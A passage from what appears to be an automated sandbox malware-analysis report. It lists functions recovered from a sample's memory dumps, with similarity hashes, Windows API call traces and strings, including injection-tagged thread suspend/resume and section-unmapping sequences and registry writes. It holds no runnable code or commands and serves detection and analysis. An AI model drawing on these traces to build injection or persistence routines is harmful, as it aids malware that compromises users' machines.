  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B73, Relevance: 7.6, APIs: 5, Instructions: 59 Total matches: 218stringthreadtime
Similarity
  • Total matches: 218
  • API ID: GetCurrentThreadIdGetSystemTimeAsFileTimeGetTempFileNamePathFindExtensionlstrcpy
  • String ID:
  • API String ID: 1809591024-0
  • Opcode ID: a7ba591b065612ca5392502f724a25a23db9ce2fa7cff4761a80896cec28b3f4
  • Instruction ID: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
  • Opcode Fuzzy Hash: 51D05B95471CC4D3595E459D102515290C66C6530619CF5467751397655B30305CEF6D
  • Instruction Fuzzy Hash: 66f2c6aac88ed1bd9334c7600f51663f9dc178801934e8592d4354f33624fdca
APIs
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetCurrentThreadId.KERNEL32(?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BAB
  • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,01B34C06,?,01B374BC,00000000,01B32D09,00000750), ref: 01B34BB7
  • GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 01B34BC5
  • PathFindExtensionA.SHLWAPI(00000000), ref: 01B34BD9
  • lstrcpy.KERNEL32(00000000), ref: 01B34BE0
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001CA73F, Relevance: 7.6, APIs: 5, Instructions: 55 Total matches: 50memoryregistry
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
  • Instruction ID: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
  • Opcode Fuzzy Hash: 40E0C2FA0244E39A502B6469683A2B8F6197C912D640D6232F6152D609BF8332A73B1E
  • Instruction Fuzzy Hash: 0faa5e966659bbae2001dc4585f1599da78a6ae1860b80842554bcb3e2384545
APIs
  • RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
  • wsprintfA.USER32 ref: 001CA775
  • RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
  • RegCloseKey.ADVAPI32(?), ref: 001CA7B5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D81E6, Relevance: 7.5, APIs: 5, Instructions: 35 Total matches: 108
Similarity
  • Total matches: 108
  • API ID: CreateEventGetCurrentProcessIdGetLastErrorGetVersionOpenProcess
  • String ID:
  • API String ID: 2618137798-0
  • Opcode ID: 1fac3af1d3adb9373cb89c72372644e4dde4d88d2c69072dbd9dfbcd659d169c
  • Instruction ID: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
  • Opcode Fuzzy Hash: 97D05E300CD904CB900F7861444435C5E49FD873C289C3A45F84020D0EEBC4E2E03F99
  • Instruction Fuzzy Hash: abc2545ef0dc46afb557436b5d1827735c549071f6e9243f9dc2d7b6ad911185
APIs
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,001C138B,?), ref: 001D81EE
  • GetVersion.KERNEL32 ref: 001D81FD
  • GetCurrentProcessId.KERNEL32 ref: 001D8214
  • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 001D8231
  • GetLastError.KERNEL32 ref: 001D8250
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C1473, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61 Total matches: 61memory
Similarity
  • Total matches: 61
  • API ID: HeapFreeRtlAllocateHeapwsprintf
  • String ID: | "%s" | %u
  • API String ID: 2081543798-1108170107
  • Opcode ID: ae5a1f8a578234636b2fd743cdac99d3783860d35e2b0785ba9b52f3117a28dd
  • Instruction ID: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
  • Opcode Fuzzy Hash: 67E07DB409184355B037ACD69025B7EC3427D810CCC8C7A7AEA023520E6E03306727CD
  • Instruction Fuzzy Hash: 277ab281c9c0564519fca3adf21b537e1a199750048c4e81c7822df4a60b697e
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D74F7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57 Total matches: 53
Similarity
  • Total matches: 53
  • API ID: CreateDirectoryGetTempFileNameGetTickCount
  • String ID: \Low
  • API String ID: 1806217356-4112222293
  • Opcode ID: 7a122810f4ba2df995a7e36e2785305a4afbcd989035409fc777345f7c9fec3f
  • Instruction ID: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
  • Opcode Fuzzy Hash: 49D0C2B9A24C468A8D56A268450A7718F61A251BD7BCC6034D7059B882E709B9CA1F12
  • Instruction Fuzzy Hash: 3f130f1f3a53128e1463fee44bdfd7f990f5237a079695b12822b0c195705b07
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D7543
  • GetTickCount.KERNEL32(00000000,?,00002365,00000000,?,001D8F26,?,?,00000000,?,001C2EC9,00000000), ref: 001D754E
  • GetTempFileNameA.KERNEL32(00000000,00000000,00000000), ref: 001D755A
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CA6B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeapmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 1636659435-3194369251
  • Opcode ID: a76e7bf81e614bf17f8f08eebcaf72a4e27078f9184a1b73ad63f98f5b0f8fb9
  • Instruction ID: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
  • Opcode Fuzzy Hash: 8AD0CD20050C91CEC927315268357A5E945BF82187C4D9173DA40342670F123161699F
  • Instruction Fuzzy Hash: 64ccfe0c75ee596e2a3944b2012f241a37e740715042665ef384d4bace949e15
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32(?,00000016,00000000,00000000,00000004,?,00000002,?,00000016,00000000,00000000,00000004,?,?,20000013,00000000), ref: 001DEC80
    • Part of subcall function 001DEBA9: GetLastError.KERNEL32 ref: 001DEC9A
  • memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
  • HeapFree.KERNEL32(00000000,?), ref: 001CA727
Strings
  • Access-Control-Allow-Origin:, xrefs: 001CA6B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3ACC, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53 Total matches: 59memorystring
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrlen
  • String ID: EMPTY
  • API String ID: 1247231264-2677276532
  • Opcode ID: 2051cc3ec5f54dabcc304b4f0cec6452e119b3d666e1d12c395dfd06a3d839d2
  • Instruction ID: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
  • Opcode Fuzzy Hash: 8DD02B3086545F8FC0275440A4383E9D84477050D9D5D1535E4402A0485B0732811FA9
  • Instruction Fuzzy Hash: 1768f262104d9a9ad108f4b9e5aa1de19fe749ec0873948c45898fa26152a5ef
APIs
  • RtlAllocateHeap.NTDLL(00000000,00010000,00000000), ref: 001C3AE8
  • lstrlen.KERNEL32(EMPTY,00000008,001EC4D7,00000000,0000010E,00000000,001C397E,?,?,001C397E), ref: 001C3B26
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL ref: 001DDEA1
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,001EC117), ref: 001DDF4F
    • Part of subcall function 001DDE6F: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001DDFC7
    • Part of subcall function 001DDE6F: StrTrimA.SHLWAPI(00000000,001E53C8), ref: 001DE039
    • Part of subcall function 001DDE6F: lstrcpy.KERNEL32(00000000,00000000), ref: 001DE061
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,?), ref: 001DE06F
    • Part of subcall function 001DDE6F: lstrcat.KERNEL32(00000000,00000000), ref: 001DE07F
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE12C
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,001EB1C0), ref: 001DE176
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000,001ED2CA), ref: 001DE185
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?,?), ref: 001DE197
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,00000000), ref: 001DE1AD
    • Part of subcall function 001DDE6F: HeapFree.KERNEL32(00000000,?), ref: 001DE1BC
  • HeapFree.KERNEL32(00000000,00000000,EMPTY), ref: 001C3B3D
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE37D, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44 Total matches: 70
Similarity
  • Total matches: 70
  • API ID: GetModuleHandleGetTickCountwsprintf
  • String ID: {%08X-%04X-%04X-%04X-%08X%04X}
  • API String ID: 1324421646-3263720277
  • Opcode ID: d940d29fd7f5330e7f547d121f366808a2e82348162453c5dafed4dbd97d3afc
  • Instruction ID: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
  • Opcode Fuzzy Hash: 0FD05E78198713E62323F4540205D39B124A4A25E348E73A5C81072598BB96B74A6B33
  • Instruction Fuzzy Hash: 4c3504695b38976792c1244a97e88c4b265a3094b164f417834ae1516bbf4c5a
APIs
Strings
  • {%08X-%04X-%04X-%04X-%08X%04X}, xrefs: 001CE3C7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CC42B, Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 262 Total matches: 55memorystring
Similarity
  • Total matches: 55
  • API ID: HeapFreelstrlenmemcpy
  • String ID: Access-Control-Allow-Origin:
  • API String ID: 3630223450-3194369251
  • Opcode ID: 6d2db76437dee989d9fadb858985fbdf1fd5b378b7da2dc10109644ce662e43c
  • Instruction ID: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
  • Opcode Fuzzy Hash: 65311E325646C0A6DC2560A24462B54E88037129E6ECC5319E366796F70F42E34FFF1E
  • Instruction Fuzzy Hash: 258d489056666574bbbe775fce556f15e393128e7745e70c480f8265f2102eec
APIs
  • memcpy.NTDLL(?,001ECCF4,0000001A,00000000,?,00000000,001CCA48,?,00000000), ref: 001CC4DA
  • lstrlen.KERNEL32(00000008,00000000), ref: 001CC6E5
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CC25A: WaitForSingleObject.KERNEL32(000001F4), ref: 001CC2E0
  • HeapFree.KERNEL32(00000000,00000008,?), ref: 001CC693
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
    • Part of subcall function 001CA6B0: RtlAllocateHeap.NTDLL(00000000,00004000,00000008), ref: 001CA6C7
    • Part of subcall function 001CA6B0: memcpy.NTDLL(?,?,00004000,?,?,001CC686,?,?), ref: 001CA705
    • Part of subcall function 001CA6B0: HeapFree.KERNEL32(00000000,?), ref: 001CA727
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
    • Part of subcall function 001C7FA5: memmove.NTDLL(00000000,00000000,00000000,?,00000000,001CAA69,001EC504,00000000,00000000,-00000039,?,?,001CABDF,?,00000000,?), ref: 001C7FEB
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DF4FD, Relevance: 6.2, APIs: 4, Instructions: 192 Total matches: 92string
Similarity
  • Total matches: 92
  • API ID: FreeLibraryGetLastErrorlstrlenmbstowcs
  • String ID:
  • API String ID: 3965213930-0
  • Opcode ID: 33e50c761254206a7693bc56ddd8fe5740e00c9b2afd6d060e954be887c38ac1
  • Instruction ID: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
  • Opcode Fuzzy Hash: 8011594A088E90A7C53360400993BD5E156E791DD6D8E73B36AE424ADA8E41B34F6F03
  • Instruction Fuzzy Hash: d34ea66cd36f06801e840848a97892b88694174aeec1fbb83900a10c6fbbc9cb
APIs
    • Part of subcall function 001DF422: RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
    • Part of subcall function 001DF422: LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
    • Part of subcall function 001DF422: GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4BC
    • Part of subcall function 001DF422: FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
    • Part of subcall function 001DF422: GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001DF422: RegCloseKey.ADVAPI32(?), ref: 001DF4EE
  • lstrlen.KERNEL32(00000001,00000008,00000000), ref: 001DF618
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001DF636
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DF68B
  • FreeLibrary.KERNEL32(?,?,00000001), ref: 001DF6F3
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DC212, Relevance: 6.1, APIs: 4, Instructions: 108 Total matches: 388threadsynchronizationinjection
Similarity
  • Total matches: 388
  • API ID: ResumeThreadSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 4069891769-0
  • Opcode ID: 52d5ac88bbbf53c9cfbe25b5062edfbbaef7bf8270021e4a65f9659b5eb139f2
  • Instruction ID: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
  • Opcode Fuzzy Hash: 97014507296660C3D102A815855973AF583E742EBAE28E600DA81B008A4E9539F0EB6D
  • Instruction Fuzzy Hash: cd3bb32f75bf20bf5f2e51cd674993756cd0b3fab1530bc6e4fbec9ec7105c71
APIs
  • memset.NTDLL ref: 001DC240
    • Part of subcall function 001DC097: memset.NTDLL ref: 001DC0D3
  • ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 001DC2CA
  • WaitForSingleObject.KERNEL32(00000064), ref: 001DC2D8
  • SuspendThread.KERNEL32(?), ref: 001DC2EB
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001DE3AA, Relevance: 6.1, APIs: 4, Instructions: 104 Total matches: 59stringtime
Similarity
  • Total matches: 59
  • API ID: memcpy$GetSystemTimeAsFileTimelstrlen
  • String ID:
  • API String ID: 1931430322-0
  • Opcode ID: 693e72703b4a898abaf84b83207713b059777c08181f4929022bd8422aa13c29
  • Instruction ID: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
  • Opcode Fuzzy Hash: DAF08162280C9557ED332454000FF6E1756F662081E8D7733CEF3683A759115254F797
  • Instruction Fuzzy Hash: 1ca3f777b08589e684f93c7ca90c71ea4e5882c064f3443b4050ccbbb3e3c560
APIs
  • GetSystemTimeAsFileTime.KERNEL32(?,00000008,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,001DE961), ref: 001DE3C0
  • lstrlen.KERNEL32(?), ref: 001DE3F0
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,?,?), ref: 001DE45F
  • memcpy.NTDLL(00000008,001E53C8,00000002,00000000,?,?), ref: 001DE474
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7E94, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 97 Total matches: 56memory
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpymemset
  • String ID: chun
  • API String ID: 1623351483-3058818181
  • Opcode ID: b1cb9c83363d1f5f3482edc3613e0487e364ca7cf0dd43c793242431dbb67071
  • Instruction ID: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
  • Opcode Fuzzy Hash: 1BF081A5584A42C8F8FA3044C1B657556D27F82A9884C7A07C947203BB65C3B7D73F5D
  • Instruction Fuzzy Hash: 1b3dc7637553890967c85caae7bd6c973b40c0b3d7f6b9c9acb280dc1fed3807
APIs
  • memset.NTDLL ref: 001C7ED0
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
  • memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D892D, Relevance: 6.1, APIs: 4, Instructions: 93 Total matches: 207
Similarity
  • Total matches: 207
  • API ID: GetLastErrorRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 3795092134-0
  • Opcode ID: 9c0483735e420b961606bb44f790258f0624431ad703bd6a52c8d6e915669058
  • Instruction ID: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
  • Opcode Fuzzy Hash: 3DF0AC400B9F91EBE45376440492F59A247BB01FB6E0EE721A9F211BC23F02625D9B1A
  • Instruction Fuzzy Hash: 6c58acee08f53c06707d3df08afd3539b760a59a5b54298cf15ee4468104f17e
APIs
  • memset.NTDLL ref: 001D894F
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 001D8A42
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
    • Part of subcall function 001D909F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D90B7
  • memcpy.NTDLL(00000218,001E3E62,00000100,?,00010003,00083097,?,00000318,00000008), ref: 001D89CA
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001D8A24
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CE0EE, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 60
Similarity
  • Total matches: 60
  • API ID: GetLastError$RtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 3867703424-0
  • Opcode ID: fbdca7628cbe78cbc3b7d70cd058564445f685c77becf59faaf0370b25f97c7a
  • Instruction ID: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
  • Opcode Fuzzy Hash: 66E0E56338CAC1DB174A70D01AF6A96EC88F8D529254F2F20D418597071E81717F9A1B
  • Instruction Fuzzy Hash: 122fb3a01901ef0d5fac8836b9b464a1318a8d45f75273aa2f28922ffcc91de3
APIs
  • RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE104
  • RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE11F
  • GetLastError.KERNEL32 ref: 001CE18D
    • Part of subcall function 001CDFE8: StrToIntExA.SHLWAPI(?,00000000,?), ref: 001CE066
    • Part of subcall function 001CDFE8: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CE096
    • Part of subcall function 001CDFE8: memcpy.NTDLL(00000000,?,?), ref: 001CE0A7
  • GetLastError.KERNEL32 ref: 001CE19C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7262, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 95string
Similarity
  • Total matches: 95
  • API ID: CloseHandleOpenFileMappinglstrlenmemset
  • String ID:
  • API String ID: 686913658-0
  • Opcode ID: c2b4898062c1065ed0612e860c2cb0de06a6071118fdcd99c43ffcca291be294
  • Instruction ID: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
  • Opcode Fuzzy Hash: 0DF05C570219CDC7C4221114D800B11B5257B76C6ACEC9399FCA014D948E0A31A9BE0B
  • Instruction Fuzzy Hash: 29d18696d3e7f5ff23962e26c385067e7714d375bcaed7b8bbfe9f18f9532956
APIs
  • memset.NTDLL ref: 001C7284
    • Part of subcall function 001CBCD2: CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001), ref: 001CBCEE
    • Part of subcall function 001CBCD2: GetLastError.KERNEL32(?,?,001C3C43,0000012B,001EB004,?,?,?,001C3C71,00000000,00000000,00000000,00000001), ref: 001CBCF9
    • Part of subcall function 001CBCD2: WaitNamedPipeA.KERNEL32(00002710), ref: 001CBD1B
    • Part of subcall function 001CBCD2: WaitForSingleObject.KERNEL32(00000000), ref: 001CBD29
  • lstrlenW.KERNEL32(?,?,?,?,?,?), ref: 001C72C8
  • OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 001C730E
  • CloseHandle.KERNEL32(?), ref: 001C7331
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B33F3A, Relevance: 6.1, APIs: 4, Instructions: 75 Total matches: 114
Similarity
  • Total matches: 114
  • API ID: CloseHandleGetSidSubAuthorityGetSidSubAuthorityCountOpenProcessToken
  • String ID:
  • API String ID: 3243309207-0
  • Opcode ID: daf6b00ae99c80d22f011dd47a129de89f1e33b4c2e36c8a2c33b66dba590708
  • Instruction ID: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
  • Opcode Fuzzy Hash: 45E02B814FCFC2D7AB5F2404059175270E6EF60E05C9D9B647520BA5665E3031257E9B
  • Instruction Fuzzy Hash: b78d02c5baa715c8e8538e39e195cedf048cde2c72120d51ace7b5a65273c297
APIs
  • OpenProcessToken.ADVAPI32(000000FF,00020008,01B37494,00000000), ref: 01B33F6C
  • CloseHandle.KERNEL32(01B37494), ref: 01B33FEC
    • Part of subcall function 01B3115C: RtlAllocateHeap.NTDLL(00000000,?,01B33CA0), ref: 01B31168
  • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 01B33FC7
  • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 01B33FD7
    • Part of subcall function 01B31171: HeapFree.KERNEL32(00000000,?,01B33D05), ref: 01B3117D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C7664, Relevance: 6.1, APIs: 4, Instructions: 74 Total matches: 40memory
Similarity
  • Total matches: 40
  • API ID: HeapFree$GetLastErrorRtlAllocateHeap
  • String ID:
  • API String ID: 692199287-0
  • Opcode ID: 4904fb8dbc2e953e77b98dbe9d3f55cb9d56c3531de4b3fdb52f823351afa574
  • Instruction ID: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
  • Opcode Fuzzy Hash: C2E0D8351D48C3E3812714E9D064BFEE500AB805C0E0D26ABBD847D20C9D127076E7C6
  • Instruction Fuzzy Hash: 722a92adabdce07ebe57fe93d154cdc54f3cb9f4f08ff129e6d81173094b21d6
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
  • GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
  • HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B31395, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71 Total matches: 21memory
Similarity
  • Total matches: 21
  • API ID: GetLastErrorHeapFreememset
  • String ID: D
  • API String ID: 2843147199-2746444292
